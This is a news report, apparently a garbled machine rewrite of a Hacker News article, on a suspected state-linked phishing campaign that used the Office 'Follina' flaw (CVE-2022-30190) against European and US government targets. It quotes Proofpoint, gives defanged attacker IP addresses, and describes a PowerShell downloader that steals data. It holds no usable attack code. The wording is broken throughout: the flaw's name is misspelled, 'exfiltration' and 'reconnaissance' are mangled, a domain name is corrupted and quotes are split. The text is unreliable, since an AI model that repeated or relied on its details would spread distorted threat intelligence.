A suspected state-linked threat actor has been blamed for a new set of attacks using the Microsoft Office “Folina” vulnerability to target government agencies in Europe and the United States.
Enterprise security firm Proofpoint says it has blocked attempts to exploit the remote code execution error, which is being tracked at CVE-2022-30190 (CVSS score: 7.8). Less than 1,000 phishing messages were sent to the target, including a tempting document.
“The campaign has been disguised as a pay rise and used an RTF with an exploitation payload downloaded from 45.76.53.[.]253, “Company Says In a series of tweets.
The payload, which comes in the form of a PowerShell script, is base64-encoded and acts as a downloader to retrieve a second PowerShell script from a remote server called “Vendor-Notification”.[.]Show live. “
“This script checks for virtualization, steals data from local browsers, mail clients and file services, manages machine icons and then zips for excel.[tration] From 45.77.156[.]179, “the company added.
The phishing campaign was not affiliated with any previously known group, but said it was mounted by a nation-state actor based on the specificity of the targeting and the broad-based reconnaissance capabilities of the PowerShell payload.
The development follows the active exploitation efforts of a Chinese threat actor tracked as TA413 for supplying armed zip archives with malware-rigged Microsoft Word documents.
The Follina vulnerability, which left the “ms-msdt:” protocol URI scheme to remotely control the target device, remained untouched, prompting Microsoft customers to disable the protocol to prevent attack vectors.
Sherrod Digrippo, vice president of threat research, said in a statement shared with The Hacker News:
“The massive restart, driven by the second PowerShell script, shows an actor interested in a variety of software on a target computer. This, combined with the strict targets of the European government and the local US government, makes us suspect that the campaign is linked to a state. Nexus.”